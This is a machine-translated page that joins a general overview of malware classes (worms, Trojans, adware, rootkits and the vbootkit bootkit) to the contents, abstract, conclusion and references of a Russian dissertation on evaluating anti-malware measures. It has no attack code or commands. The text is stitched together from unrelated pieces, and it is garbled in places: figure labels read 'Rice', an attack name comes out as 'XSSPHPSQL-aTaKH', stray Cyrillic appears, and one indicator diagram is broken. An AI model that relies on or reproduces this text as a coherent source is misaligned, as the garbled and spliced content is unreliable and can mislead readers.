Antivirus companies are reporting a new trend in the spread of viruses. After a wave of email and script viruses, flash drives connected to a computer using USB are now one of the most popular ways to spread malware. This became possible due to the weakness of the Windows operating system, which by default automatically launches the autorun.inf file from a removable drive.

According to some experts, the INF/Autorun service in Windows OS can be considered the main security hole in computer systems. Unlike sending infected programs by email, in this case, even a competent user is practically unable to prevent infection, because simply inserting an infected device into a USB connector, and the process becomes irreversible. The only prevention may be to disable autorun, which is recommended even by security experts from Microsoft itself.

You could say that in some ways, the spread of viruses on USB drives is a return to the origins of virus creation, when the Internet did not yet exist. Back then, viruses spread from computer to computer using floppy disks.

Software bookmark is a program external or internal to the computer system being attacked that has certain destructive functions in relation to this system:

• distribution in distributed computer systems in order to implement one or another threat to information security (computer or network worms, which, unlike computer viruses, should not have the property of including their code in the bodies of other files);
• carrying out various actions unauthorized by the user (collection of confidential information and its transfer to the violator, destruction or intentional modification of user information, disruption of the computer, use of computer resources for unseemly purposes (“Trojan” programs or simply “Trojans”);
• destruction or modification of the functioning of the CS software, destruction or change of data processed in it after the fulfillment of some condition or receipt of some message from outside the CS (“logic bombs”);
• substitution of individual functions of the CS security subsystem or creation of “traps” in it to implement threats to the security of information in the CS (for example, substitution of encryption means by emulating the operation of a hardware encryption board installed in the CS);
• intercepting CS user passwords by simulating an invitation to enter it or intercepting all user input from the keyboard;
• interception of the flow of information transmitted between objects of a distributed CS (monitors);
• Opportunistic programs that are developed by legitimate manufacturers but contain potentially dangerous functions that can be used by an attacker.

As a rule, in order for a network worm to begin its work, you need to launch a file received by e-mail (or follow the link contained directly in the e-mail message). But there are also worms whose activation does not require human intervention:

• the worm is contained in the text of the letter itself and is launched when the user simply opens the message (or it opens in the preview pane in the mail client window) (the letter in this case is text in a language containing a script with the worm code);
• The worm exploits “holes” (gaps, vulnerabilities) in the security systems of operating systems and other programs (for example, email).

To induce a user to run a file received by email, criminals use very sophisticated technologies called social engineering. For example, an offer to fill out the form attached to the letter in order to receive a large cash prize that the user allegedly won. Or disguised as an official mailing from a well-known software company (you should know that these companies never send out any files without the user’s request), etc.

Once launched, the worm is able to send its code by email using the “address book” of the email program. After this, the computers of friends of the user of the infected computer are also infected.

The main difference between network worms and classical viruses is precisely the ability to self-propagate across the network, as well as the absence of the need to infect other local objects on the infected computer.

To spread, network worms use a variety of computer and mobile networks: email, instant messaging systems, file-sharing (P2P) and IRC networks, local area networks (LAN), data exchange networks between mobile devices (phones, PDAs), etc. .d.

Most known worms are distributed in the form of files: an attachment to an email, a link to an infected file on some Web or FTP message in ICQ and IRC messages, a file in a P2P exchange directory, etc. Some worms ( so-called “fileless” or “packet” worms) spread in the form of network packets, penetrating directly into the computer’s memory and activating their code.

Some worms also have properties of other types of malware. For example, some worms contain functions for collecting and transmitting to the intruder confidential information of the user of the infected computer or are capable of infecting executable files on the local disk of the infected computer, i.e., they have the properties of a Trojan program and (or) a computer virus.

In Fig. Table 4.1 shows data showing the distribution of computer viruses (virus) and various categories of network worms (worm) in 2008 (according to Kaspersky Lab).

Rice. 4.1.

Certain categories of Trojan programs cause damage to remote computers and networks without harming the infected computer (for example, Trojan programs designed for massive DDoS attacks on remote network resources).

Unlike worms and viruses, Trojans do not damage other files and do not have their own means of spreading. These are simply programs that perform actions harmful to the user of an infected computer, for example, intercepting a password for accessing the Internet.

Currently, within the class of Trojan programs, Kaspersky Lab experts identify three main groups of behaviors:

• Backdoor (providing an attacker with the ability to remotely administer an infected computer), Trojan-Downloader (delivery of other malicious programs to the user’s computer), Trojan-PSW (password interception), Trojan (other Trojan programs), the most common Trojan programs;
• Trojan-Spy (spyware), Trojan-Dropper (installers for other malicious programs);
• Trojan-Proxy (“Trojan” proxy servers), Trojan-Clicker (Internet clickers), Rootkit (hiding their presence in a computer system), Trojan-DDoS (programs for participating in distributed denial of service attacks), Trojan- SMS (“mobile Trojans” are the most pressing threat to mobile devices).

Some programs have a set of functions that can harm the user only if a number of conditions are met. Moreover, such programs can be legally sold and used in everyday work, for example, by system administrators. However, in the hands of an intruder, such programs can turn into a tool that can be used to cause harm to the user. Kaspersky Lab specialists classify such programs into a separate group of conditionally dangerous programs (they cannot be unambiguously classified as either dangerous or safe).

This type of program is optionally detected by anti-virus programs if the user consciously selects an expanded set of anti-virus databases. If the programs discovered when using extended databases are familiar to the user and he is 100% sure that they will not cause harm to his data (for example, the user himself purchased this program, is familiar with its functions and uses them for legal purposes), then the user can either refuse further use of extended anti-virus databases, or add such programs to the list of “exceptions” (programs for which further detection will be disabled).

Potentially dangerous programs include programs of the classes RiskWare (legally distributed potentially dangerous programs), Porn Ware (programs for displaying pornographic information) and AdWare (advertising software).

The RiskWare class of programs includes legal programs (some of them are freely sold and widely used for legal purposes), which, nevertheless, in the hands of an intruder, can cause harm to the user and his data. In such programs you can find legal remote administration utilities, IRC client programs, auto-dialer programs (dialers), download programs (downloaders), monitors of any activity (monitor), utilities for working with passwords, as well as numerous Internet servers for FTP, Web, Proxy and Telnet services.

All of these programs are not malicious in themselves, but they do have capabilities that attackers can take advantage of to cause harm to users. For example, a remote administration program allows you to access the interface of a remote computer and be used to manage and monitor the remote machine. Such a program may be completely legal, freely distributed and necessary in the work of system administrators or other technical specialists. However, in the hands of violators, such a program can cause harm to the user and his data by gaining full remote access to someone else's computer.

As another example, consider a utility that is a client of an IRC network: the advanced functionality of such a utility can be taken advantage of by violators and the Trojan programs they distribute (in particular, Backdoor), which use the functions of such a client in their work. Thus, a Trojan program is capable of adding its own scripts to the IRC client configuration file without the user’s knowledge and successfully performing its destructive functions on the infected machine. In this case, the user will not even suspect that a malicious Trojan program is operating on his computer.

Often, malicious programs independently install an IRC client on the user’s computer for subsequent use for their own purposes. In this case, the location is usually the Windows folder and its subfolders. Finding an IRC client in these folders almost certainly indicates that the computer has been infected with some kind of malware.

Advertising software (Adware, Advware, Spyware, Browser Hijackers) is designed to display advertising messages (most often in the form of graphic banners) and redirect search queries to advertising Web pages. With the exception of displaying advertisements, such programs, as a rule, do not show their presence in the system in any way. Typically, Adware programs do not have an uninstallation procedure.

• by embedding advertising components into free and shareware software (freeware, shareware);
• through unauthorized installation of advertising components when the user visits “infected” Web pages.

Most programs in the freeware and shareware categories stop displaying advertisements after they are purchased and/or registered. Such programs often use built-in Adware utilities from third-party manufacturers. In some cases, these Adware utilities remain installed on the user’s computer even after registering the programs with which they originally entered the user’s system. At the same time, removing the Adware component that is still used by any program to display advertising may lead to malfunctions of this program.

The basic purpose of this type of Adware is an implicit form of payment for software, carried out by showing advertising information to the user (advertisers pay the advertising agency for displaying their advertising, and the advertising agency pays the Adware developer). Adware helps reduce costs both for software developers (income from Adware encourages them to write new and improve existing programs) and for users themselves.

In the case of installation of advertising components when a user visits “infected” Web pages, in most cases hacker technologies are used (penetration into the computer through a gap in the security system of the Internet browser, as well as the use of “Trojan” programs designed to covertly install software). Adware programs that act in this way are often called “Browser Hijackers.”

In addition to delivering advertisements, many advertising programs also collect confidential information about the computer and the user (IP address, OS and Internet browser version, list of the most frequently used Internet resources, search queries and other information that can be used for advertising purposes).

For this reason, Adware programs are often also called Spyware (adware in the Spyware category should not be confused with Trojan-Spy spyware). Programs in the Adware category cause harm associated not only with the loss of time and distraction of the user from work, but also with the very real threat of leaking confidential data.

The distribution of programs of the RiskWare and PornWare classes by behavior can be presented in the form of a pie chart (Fig. 4.2, according to Kaspersky Lab).

AdTool are various advertising modules that cannot be classified as AdWare, since they have the necessary legal attributes: they are equipped with a license agreement, demonstrate their presence on the computer and inform the user about their actions.

Rice. 4.2.

Porn-Dialers independently (without notifying the user) make telephone connections to premium numbers, which often leads to litigation between subscribers and their telephone companies.

Programs in the Monitor category include legal “key loggers” (programs for tracking keystrokes), which are officially produced and sold, but if they have the function of hiding their presence in the system, such programs can be used as full-fledged spyware Trojans.

Programs in the PSW-Tool category are designed to recover forgotten passwords, but can easily be used by criminals to extract these passwords from the computer memory of an unsuspecting victim. Programs in the Downloader category can be used by criminals to download malicious content onto a victim computer.

Other malware includes a variety of programs that do not directly pose a threat to the computer on which they are executed, but are designed to create other malicious programs, organize DDoS attacks on remote servers, hack other computers, etc.

Such programs include virus hoaxers (Hoax) and false anti-virus programs (FraudTool), “hacker” programs for “hacking” remote computers (Exploit, HackTool), constructors and packagers of malicious programs (Constructor, VirTool, Packed), programs for sending spam and “clogging” attacks (SpamTool, IM-Flooder, Flooder), programs for misleading the user (BadJoke).

The main type of FraudTool is the so-called rogue-antivirus - programs that pretend to be full-fledged antivirus tools. After installing it on a computer, they always “find” some kind of virus, even on an absolutely “clean” computer system, and offer to buy their paid version for “treatment”. In addition to directly deceiving users, these programs also contain the AdWare function. In fact, this is a real scam based on users' fear of malware.

Hacker utilities of the Exploit and HackTool categories are designed to penetrate remote computers for the purpose of further controlling them (using backdoor Trojan programs) or to introduce other malicious programs into the hacked system. Hacker utilities such as “exploit” exploit vulnerabilities in operating systems or applications installed on the attacked computer.

Virus and Trojan program constructors are utilities designed to create new computer viruses and Trojan horses. Virus designers for DOS, Windows and macro viruses are known. They allow you to generate virus source texts, object modules and (or) directly infected files.

Some constructors are equipped with a standard graphical interface, where, using a menu system, you can select the type of virus, objects to be affected, the presence or absence of encryption, resistance to the debugger, internal text strings, as well as effects accompanying the operation of the virus, etc. Other constructors do not have an interface and read information about the type of virus being created from their configuration file.

Utilities of the Nuker category send specially designed requests to attacked computers on the network, as a result of which the attacked system stops working. These programs exploit vulnerabilities in the software of network services and operating systems, as a result of which a special type of network request causes a critical error in the attacked application.

Programs in the Bad-Joke and Hoax categories include programs that do not cause any direct harm to the computer, but display messages indicating that such harm has already been caused, or will be caused under any conditions, or warns user about a non-existent danger. “Evil jokes” include, for example, programs that display messages to the user about formatting the hard drive (although no formatting actually occurs), detect viruses in uninfected files, display strange virus-like messages, etc.

Polymorphic generators are not viruses in the literal sense of the word, since their algorithm does not include reproduction functions. The main function of this kind of program is to encrypt the body of the virus and generate a corresponding decryptor.

Typically, polymorphic generators are distributed by their authors without restrictions in the form of an archive file. The main file in the archive of any generator is the object module containing this generator.

The evolution of the functioning of malware from single modules to complex and interacting projects began at the beginning of this century. The new model of malware functioning should not only become the standard for a mass of new malicious projects, but also be further developed.

The main features of this model are the following:

• lack of a single control center for a network of infected computers;
• active counteraction to attempts by third-party research and interception of control;
• Simultaneous mass and short-term distribution of malicious code;
• competent use of social engineering tools;
• using different distribution methods and phasing out the most visible ones (email);
• using different modules to implement different functions (rather than one universal one).

By analogy with the well-known term Web 2.0, the new generation of malware can be called MalWare 2.0.

The technique of hiding presence in a system (rootkits) will be used not only in Trojan programs, but also in file viruses. Thus, there will be a return to the times of the MS-DOS operating system, when resident stealth viruses existed. This is a logical development of methods for countering antivirus programs. Malicious programs now tend to “survive” on the system even after being detected.

Another dangerous way to hide the presence of a program on a computer is the technology of infecting the boot sector of a disk - the so-called “bootkits”. This is another return of an old technique, allowing the malicious program to gain control before the main part of the operating system (and antivirus programs) loads. Bootkits are rootkits with the function of loading from the boot sectors of any device. Their danger lies in the fact that the malicious code gains control even before the OS, and therefore the antivirus program, starts.

One of the most striking examples of the implementation of bootkit technology is vbootkit. A simplified sequence of vbootkit actions looks like this. After turning on the computer and running BIOS programs, the Vbootkit code (from a CD or other device) is activated. The boot program from the MBR and the Windows Vista boot loader are then executed, after which control is transferred to the kernel of this operating system.

Once vbootkit gains control of the system, it triggers a BIOS 13 interrupt, then searches for signatures for Windows Vista. Once detected, it begins modifying Windows Vista while hiding itself (by placing its code in small chunks in different areas of RAM). These modifications include bypassing security measures such as checking electronic digital signatures, checking hashes, and performing certain actions to maintain control of the system during both the first and second phases of the boot process.

The second stage involves extending the operating system kernel so that vbootkit retains control of it until it is rebooted. This way the user will have a vbootkit loaded into the Windows Vista kernel.

Bootkits store in the boot sector only the minimum necessary to run the main code. This core code is stored in other sectors, the contents of which the bootkit hides by intercepting BIOS interrupts to read the sector.

Users of social networks can become the main target of so-called phishing. The credentials of subscribers of various network services will be in high demand among violators. This will be an important alternative to the technique of placing malware on hacked Web sites. Trojan programs can be distributed precisely through the accounts of social network users, through their blogs and profiles.

Another problem related to social networks can be XSSPHPSQL-aTaKH. Unlike phishing, which relies solely on deception and social engineering techniques, these attacks exploit bugs and vulnerabilities in Web 2.0 services themselves and can affect even highly literate users. In this case, the target of the violators is the personal data of users, which is needed to create certain databases and lists for carrying out subsequent attacks using “traditional” methods.

The main factors ensuring the simultaneous interest of users and hackers in Web 2.0 services are:

• transfer of user data from a personal computer to the Internet;
• using one account for several different services;
• availability of detailed information about users;
• availability of information about connections, contacts and acquaintances of users;
• providing a place for publication of any information;
• trusting relationships between contacts.

This problem is already quite serious and, according to experts, has every chance of becoming a major information security problem.

As for mobile devices, and primarily mobile phones, threats to them are distributed between primitive Trojan programs and various vulnerabilities in operating systems and applications for smartphones.

In accordance with the methods of introducing software bookmarks into the CS and possible locations for their placement in the system, bookmarks can be divided into the following groups:

• software bookmarks associated with BIOS;
• bookmarks associated with boot and boot programs of the operating system;
• bookmarks associated with operating system drivers and other system modules;
• bookmarks associated with general-purpose application software (for example, archivers);
• program files containing only the bookmark code and implemented using batch batch files;
• bookmarks masquerading as general-purpose application software;
• bookmarks disguised as gaming and educational software (to facilitate their initial implementation in the computer system).

Chapter 1. FEATURES OF COUNTERING ♦ MALWARE IN CRITICAL

IMPORTANT SEGMENTS OF THE INFORMATION SPHERE.

1.1. Malicious programs as a source of threats to critical segments of the information sphere.

1.2. Counteracting malware in critical segments of the information sphere.

1.3. Statement of the problem of a comprehensive assessment of the effectiveness of countering malware in critical segments of the information sphere.

1.4. Conclusions.

Chapter 2. FORMATION OF INDICATORS

EFFECTIVENESS OF COUNTERING MALWARE IN CRITICAL SEGMENTS OF THE INFORMATION SPHERE.

2.1. Methodology for structuring performance indicators against malware.

2.2. Methodology for synthesizing the hierarchical structure of anti-malware effectiveness indicators.

2.3. A unified description of the structure of anti-malware performance indicators

2.4. Conclusions.

Chapter 3. MATHEMATICAL MODELING

PROCESSES FOR COUNTERING MALWARE IN CRITICAL SEGMENTS OF THE INFORMATION SPHERE.

3.1. Features of the synthesis of a mathematical model for assessing the effectiveness of countering malware.

3.2. Formal presentation of the processes of functioning of anti-malware tools.

3.3. Simulation model for assessing the temporal effectiveness of countering malware

3.4. Analytical models for assessing probabilistic indicators of the effectiveness of countering malware. ^

3.5. Presentation of initial data for assessing probabilistic indicators of the effectiveness of countering malware.

3.6. Conclusions.

Chapter 4. COMPUTING EXPERIMENTS TO ASSESS THE EFFECTIVENESS OF COUNTERING MALWARE IN CRITICALLY IMPORTANT SEGMENTS OF THE INFORMATION SPHERE.

4.1. Methodology for planning computational experiments to assess the effectiveness of countering malware

4.2. Results of computational experiments.

4.3. Analysis of the effectiveness of the proposed method for assessing counteraction to malware.

4.4. Conclusions.

Recommended list of dissertations

• Mathematical models of generalized assessment of the effectiveness of countering threats to the security of segments of the information sphere 2006, Candidate of Technical Sciences Likhodedov, Denis Yurievich

• Functional modeling of malicious impacts on critical segments of the information sphere 2008, candidate of technical sciences Modestov, Alexey Albertovich

• Modeling and optimization of the functioning of automated control systems of internal affairs bodies in the context of countering malware 1999, Doctor of Technical Sciences Skryl, Sergey Vasilievich

• Theoretical foundations and practical implementation of the synthesis of information systems for automated control complexes of critical objects 2009, Doctor of Technical Sciences Krupenin, Alexander Vladimirovich

• Research and development of algorithms for recognizing malware when countering unauthorized influence on information resources of secure computer networks 2004, Candidate of Technical Sciences Kiselev, Vadim Vyacheslavovich

Introduction of the dissertation (part of the abstract) on the topic “Development and research of algorithms for comprehensive assessment of the effectiveness of countering malware in critical segments of the information sphere”

Relevance of the research topic. The intensive development and improvement of information technologies leads to the need to consider the expansion of the information sphere as a dominant trend. This led to the emergence of a separate class of elements of this sphere, its so-called critical segments - information systems supporting the activities of government bodies /1/, communication infrastructure management systems /2/, finance /3/, energy /4/, transport 151 and emergency services 161. At the same time, the expansion of the information sphere has led to the emergence of various types of threats to elements of the information sphere 111. At the same time, its critical segments have become the main object of such threats. This necessitated the need to solve a number of problems related to the organization of protection of the information sphere in order to prevent damage from violations of its security in the presence of various sources of threats /8 - 13/.

One of the most serious sources of threats in the information sphere is malware /14 - 16/ - one of the main tools for illegal manipulation of information /17/ in its computer networks /18/. Malicious programs are designed by highly qualified specialists /19/ as virus-type programs /20 - 26/, which makes it possible to use such advantages of computer viruses as isomorphic structure, the ability to create their own copies and manifest themselves only under certain parameters of the computing environment /27 - 28/. These properties allow malicious programs to implement the functions of illegal manipulation of information in extremely short periods of time, which significantly complicates the ability to detect and eliminate them, and as a result, places such programs in the category of one of the most advanced tools for illegal actions in the information sphere today. sphere /29/.

Malicious programs affect, first of all, the temporary characteristics of elements of the information sphere, since their impact results in significant temporary losses associated with restoring the correctness of information processes.

In this regard, it becomes obvious that malicious programs are a factor in a significant reduction in the efficiency of use, first of all, of critical segments of the information sphere, since their activities are focused on the rapid processing of incoming information. This, in turn, allows us to classify malware as a separate class of the most serious threats to the security of the information sector.

Hence, the problem of protecting critical segments of the information sphere from this type of threat becomes urgent. It is obvious that its solution must be carried out systematically, based on a comprehensive study of anti-malware technologies. The fact that such technologies are characterized by many heterogeneous parameters makes their research issues complex, both scientifically and practically.

Similar studies suggest:

Conducting a system analysis of the state of protection against malware as a whole in the information sphere and its individual critical segments;

Research of effective methods and means of counteracting malware;

Assessment of anti-malware technologies in critical segments of the information sphere.

All this has necessitated the search for approaches to assessing the effectiveness of countering malware that would systematically take into account all the many properties of the technologies used.

As an analysis of the state of the issue /30/ shows, one of the most promising ways to solve this problem is to synthesize a complex indicator that characterizes the capabilities of the technologies used to counter malware. At the same time, the synthesis of a complex indicator has a number of features associated with the presence of many directions both in classifying the capabilities of various technologies to counter malware, and in the use of mathematical tools for research.

This made it possible to propose a fundamentally new approach to solving the problem of comprehensive assessment of the effectiveness of countering malware in critical segments of the information sphere.

The essence of this approach is to develop reasonable rules for the synthesis of a comprehensive indicator of the effectiveness of countering malware, the form of which will be optimal from the point of view of reflecting the capabilities of the counteraction technologies used.

Despite the fact that improving the theory and practice of ensuring information security has become an extremely pressing problem, special studies in relation to the tasks of a comprehensive assessment of the effectiveness of countering malicious programs in the information sphere in general and countering malicious programs in its critical segments, in particular, have not been carried out.

Due to the fact that the proposed method for assessing the effectiveness of countering malware is not covered in the available literature, and the known methods do not allow for a comprehensive assessment of the capabilities of anti-malware tools, this gives grounds to assert that the task of developing methods for comprehensively assessing the effectiveness of these tools is extremely relevant. and the issues related to this area need serious study both in methodological and applied terms. All this indicates the relevance of the topic of this dissertation work, carried out in accordance with the Information Security Doctrine of the Russian Federation 111, as well as in accordance with the scientific direction of the Voronezh Institute of the Ministry of Internal Affairs of Russia related to the substantiation of requirements for information security means and systems.

The object of the research is technologies to counter malware in critical segments of the information sphere.

The subject of the research is methods for comprehensive assessment of the effectiveness of countering malware in critical segments of the information sphere.

The goal of the dissertation work is to improve methods for assessing counteraction to malware in critical segments of the information sphere based on the synthesis of a comprehensive indicator of the effectiveness of the counteraction technologies used.

To achieve the goal, the following scientific tasks are solved:

Theoretical justification of system requirements for the synthesis of a comprehensive indicator of the effectiveness of countering malware in critical segments of the information sphere;

Development of an algorithm for the synthesis of such an indicator;

Construction of an optimal structure of private indicators of the effectiveness of the anti-malware technologies used;

Development of a set of analytical and simulation models that provide assessment of the effectiveness indicators of the used anti-malware technologies;

Experimental testing of algorithms for comprehensive assessment of the effectiveness of countering malware in critical segments of the information sphere.

Research methods. The work uses methods of system analysis, information security theory, set theory, graph theory, mathematical modeling, probability theory and mathematical statistics, and the theory of random processes.

The validity and reliability of the results obtained is ensured by:

The use of proven mathematical tools in the process of formalizing the processes of countering malware;

Experimental verification of the developed mathematical models and the correspondence of the results obtained to cases known from the scientific literature.

The scientific novelty and theoretical significance of the results obtained in the dissertation are as follows:

1. Algorithms have been developed for a comprehensive assessment of the effectiveness of countering malware in critical segments of the information sphere, which differs from known methods for solving similar problems in that the integration of particular indicators is carried out based on taking into account their influence on the target function - the degree of prevention of damage to the information sphere from a violation of its security.

2. A methodological approach to combining simulation and analytical modeling is proposed to evaluate particular indicators of anti-malware technologies, which, unlike analogues, makes it possible to control the level of detail of the processes under study.

3. New solutions have been proposed for constructing mathematical models for countering malware, based on the use of similarity of private indicators of the technologies used to counter the classical representation of random variables.

The practical value of the research lies in the development of an effective decision support system for assessing the technologies used to counter malware in critical segments of the information sphere, which performs the following functions:

Analysis and generalization of particular indicators of countering malware for various practical options for used counteraction technologies;

Construction of analysis schemes for anti-malware technologies that are convenient for practical understanding;

Comparison of effectiveness indicators of various anti-malware technologies.

The results of theoretical and experimental research can be used to solve the following scientific and applied problems:

Justification of new approaches to organizing counteraction to malware in critical segments of the information sphere;

Analysis of existing technologies to counter malware during their use.

The results obtained can be used in lecture courses and educational materials at higher educational institutions when studying the basics of information security, as well as in retraining personnel responsible for the security of critical segments of the information sphere.

The following main provisions of the dissertation work are submitted for defense:

1. Statement and results of solving the problem of synthesizing a comprehensive indicator of the effectiveness of counteracting malware in critical segments of the information sphere based on constructing an optimal structure of private indicators and its application to assess the effectiveness of the technologies used to counteract malware.

2. A methodological approach to combining simulation and analytical modeling to evaluate specific indicators of anti-malware technologies.

Implementation of work results. The results of the dissertation work are implemented in:

Military Institute of Radio Electronics of the Ministry of Defense of the Russian Federation;

Voronezh Institute of the Ministry of Internal Affairs of the Russian Federation;

Main Department of Internal Affairs of the Voronezh Region;

Department of Internal Affairs of the Tambov region.

The implementation of the results is confirmed by relevant acts.

Approbation of work. The main methodological and practical results of the research were presented at the following conferences:

The main methodological and practical results of the research were presented at the following conferences:

1. All-Russian scientific and practical conference “Modern problems of fighting crime” - Voronezh, 2002 /48/.

2. Interregional scientific and practical conference “Information and Security” - Voronezh, 2002 /56/.

3. IV All-Russian Scientific and Practical Conference “Security, Security and Communications” - Voronezh, 2003 /49/.

4. All-Russian scientific and practical conference “Modern problems of fighting crime” - Voronezh, 2005 /57/.

In the works published in co-authorship, the applicant personally proposed: in /28/ - to classify computer viruses taking into account their complex manifestation of the properties of associativity, replicativity and isomorphism; in /29/ - an illustration of the use by attackers of various properties of computer viruses when implementing the stages of a general strategy for unauthorized access to information in computer systems; in /30/ consider their activity and survivability as the main classifying characteristics of the properties of malicious programs; in /35/ - systematization of the circumstances that determine the need to keep the actions of law enforcement agencies secret; in /48/ - identify illegal actions in the field of computer information using a two-level system, the first level of which ensures the identification of the fact of an illegal action, and the second - traces of such influences; in /49/ - identify facts of illegal influence on information in computer networks using semantic control of information parameters of computing processes; in /50/ - as a fundamental principle for identifying computer crimes, the principle of a hierarchical description of strategies for unauthorized access to information in computer systems; in /53/ - use distributed information protection technologies as a source of forensically significant information in the investigation of computer crimes; in /54/ - to consider the presence of a full set of identifying signs of this kind of illegal actions as the dominant factor in increasing the detection rate of computer crimes; in /56/ - consider the methodology for assessing the security of information and telecommunication systems from threats to their information security as a procedure for forming a hierarchical structure of indicators, consider as an example of a functional information model the activity of the special forces regime service in providing employees with official documentation; in /57/ - to form a comprehensive indicator for assessing the effectiveness of countering malware based on the hierarchical structuring of private indicators; in /67/ - use a functional description of information processes as a necessary stage of their formalization.

Structure and scope of work. The dissertation is presented on 164 pages and consists of an introduction, four chapters, a conclusion, a bibliography of used literature and an appendix, contains 51 figures and 19 tables.

Similar dissertations in the specialty "Methods and systems of information security, information security", 05.13.19 code VAK

• Mathematical model of countering unauthorized access to information and telecommunication systems using various types of information security means while minimizing the distraction of computing resources 2002, candidate of technical sciences Kochedykov, Sergey Sergeevich

• Modeling and optimization of information processes in territorial segments of the unified information and telecommunication system of internal affairs bodies in the context of countering threats to information security 2006, Candidate of Technical Sciences Chagina, Lyudmila Vladimirovna

• Modeling of malicious impacts on protected information systems in order to identify illegal actions in the field of computer information 2005, Candidate of Technical Sciences Tyunyakin, Roman Nikolaevich

• Malware recognition based on hidden Markov models 2012, Candidate of Technical Sciences Kozachok, Alexander Vasilievich

• Mathematical models for assessing the effectiveness of private security units in providing services in the field of technical information protection 2005, Candidate of Technical Sciences Fedorov, Ivan Semenovich

Conclusion of the dissertation on the topic “Methods and systems of information security, information security”, Sushkov, Pavel Feliksovich

4.4. conclusions

1. It is advisable to assess the effectiveness of countering malware in critical segments of the information sphere based on an analysis of various options for using countermeasures in accordance with the plan of computational experiments.

2. The use of methods developed in the dissertation for assessing the effectiveness of countering malware in critical segments of the information sphere allows us to reduce the range of mathematical models used by 50%.

3. The accuracy characteristics of the hierarchical structure of indicators proposed in the dissertation, due to the use of a probability scale, are at least two orders of magnitude higher than the accuracy characteristics of known integrated indicator structures.

4. The method developed in the dissertation for assessing the effectiveness of counteracting malware in critical segments of the information sphere can be considered as a universal method for assessing the security of information objects.

Level 5

The purpose of information protection is to prevent damage from information security breaches

Level 4

Level 3

Level 2

Opportunities for preventing violations of confidentiality (leakage) of information

Possibilities for preventing violation of the integrity of infoormacin

Possibilities for protecting information from leakage due to side electromagnetic radiation and interference

Possibilities for preventing violation of accessibility (blocking) of information

Opportunities for protecting information from unauthorized access

Possibilities for protecting speech information (from leakage through the acoustic channel)

Opportunities to prevent conditions favorable to the emergence of threats

Opportunities for preventing the emergence of NSD threats 1

Opportunities for preventing the emergence of threats of information leakage through physical fields

Opportunities for detected threat sources

Woam< южк» ста по закрытию доступа в обход системы защиты и и форма-цкн

Opportunities for neutral and negative threats NSD X X

Opportunities for neutralizing threats of information leakage through physical fields X

Opportunities for detection and impact of NSD threats

Opportunities for detecting the impact of threats of information leakage through PEMIN channels

Possibilities for detection and impact of threats of information leakage via acoustic channel X

Possibilities for recovering information after exposure to NSD threats

BOiMG&HdCTtt on information recovery after exposure to threats of information leakage through ghemim channels

Opportunities restored!! yu information after exposure to threats of information leakage to the acoustic channel

Maybe*

Level 1

Possibly Possibly

Guidelines for limiting access to access to information resources resources

ITKS ITKS

Possibilities for hiding radiation and interference from informative channels (physical fields)

Maybe

STA on disinformation (imitation of radiation and interference)

Possibilities for cryptographic transformation of information

Maybe

Guidelines for monitoring elements (state of elements) of TSOI and ITKS

It is possible to register information about the functioning of TSIOI from the point of view of RF

Opportunities for timely destruction of spent and unused information

Possibilities for signaling manifestations and threats of illegal activities

Possibilities for signaling the manifestation of threats of information leakage through PEMIN channels

Possibilities for signaling the manifestation of threats of information leakage through acoustic channels for responding to manifestations of threats (defusing threats)

Opportunities for Englishization of manifestations and threats of NSD

It is possible to respond to the manifestation of threats (neutralize threats) via acoustic channels

Rice. 4.3.2. Structure of indicators of heterogeneous technical systems and information security means of information and telecommunication systems

CONCLUSION

The main scientific results obtained in the dissertation work are as follows:

1. A method of generalized assessment of the effectiveness of a system for countering malware in critical segments of the information sphere is theoretically justified and practically implemented based on the structuring of particular indicators of countermeasures.

2. A method has been developed to optimize the structure of private indicators for countering malware. In accordance with it, it is proposed:

Present the set of countermeasures indicators in the form of a hierarchical structure with a consistent generalization of the properties of countermeasures;

The levels of the hierarchical structure are presented in the form of sets of indicators corresponding to the main classes of capabilities of countermeasures to ensure the security of computer networks that form the material basis of the information sphere;

As a tool for studying the effectiveness of countering malware, use simulation and analytical models that describe the processes of functioning of countermeasures.

3. A methodology has been developed for assessing various options for equipping computer networks with anti-virus tools, based on the principles of the theory of computational experiments using mathematical models developed in the dissertation.

The following new practical results were obtained in the dissertation:

1. Research carried out using developed mathematical models for countering malware in critical segments of the information sphere gives grounds to assert that:

The use of methods developed in the dissertation for assessing counteraction to malware in critical segments of the information sphere makes it possible to reduce the range of mathematical models used by 50%.

The accuracy characteristics of the hierarchical structure of indicators proposed in the dissertation, due to the use of a probability scale, are at least two orders of magnitude higher than the accuracy characteristics of known integrated indicator structures.

The practical significance of these results is that they make it possible to quantify the feasibility of carrying out measures to combat malware in critical segments of the information sphere.

2. The developed methods, models and algorithms together represent methodological support for solving the practical problem of assessing the effectiveness of countering malware in critical segments of the information sphere. It can be used to solve similar problems when assessing the security of information objects from similar threats to their information security.

List of references for dissertation research Candidate of Technical Sciences Sushkov, Pavel Feliksovich, 2005

1. Telecommunications. World and Russia. State and development trends / Kleshchev N.T., Fedulov A.A., Simonov V.M., Borisov Yu.A., Osenmuk M.P., Selivanov S.A. M.: Radio and communication, 1999. - 480 p.

2. Khomyakov N.N., Khomyakov D.N. Analysis of nuclear power plant safety during terrorist attacks. // Security systems. 2002. - No. 2(44). - pp. 74-76.

3. Moshkov G.Yu. Ensuring the safety of transport facilities is our priority. // Security systems. - 2003. - No. 6(48). - P. 8-9.

4. Agapov A.N. Nuclear and radiation safety. Emergency preparedness. // Security systems. 2003. - No. 2(50). - P. 8-10.

5. Doctrine of information security of the Russian Federation // Rossiyskaya Gazeta dated September 28, 2000.

6. Gerasimenko V.A. Information protection in automated data processing systems: In 2 books: Book. 1. M.: Energoatomizdat, 1994. - 400 p.

7. Gerasimenko V.A. Information protection in automated data processing systems: In 2 books: Book. 2. M.: Energoatomizdat, 1994. - 176

8. Gerasimenko V.A., Malyuk A.A. Fundamentals of information security: Textbook for higher educational institutions of the Ministry of General and Professional Education of the Russian Federation M.: MEPhI, 1997. - 538 p.

9. Fundamentals of information security: Textbook for higher educational institutions of the Ministry of Internal Affairs of Russia / Ed. Minaeva, V.A. and Skryl S.V. - Voronezh: Voronezh Institute of the Ministry of Internal Affairs of Russia, 2001. - 464 p.

10. Shcherbakov A.A. Destructive software influences. M.: Publishing house "Edel", 1993. 64 p.

11. Mukhin V.I. Information and software weapons. Destructive software influences. // Scientific and methodological materials. M.: Military Academy of Strategic Missile Forces named after Peter the Great, 1998.-44 p.

12. Skryl S.V. Classification of software for theft and distortion of information in automated information systems // High technologies in technology, medicine and education: Interuniversity collection. scientific tr., Part 2. Voronezh: VSTU, 1997. - P. 131-137.

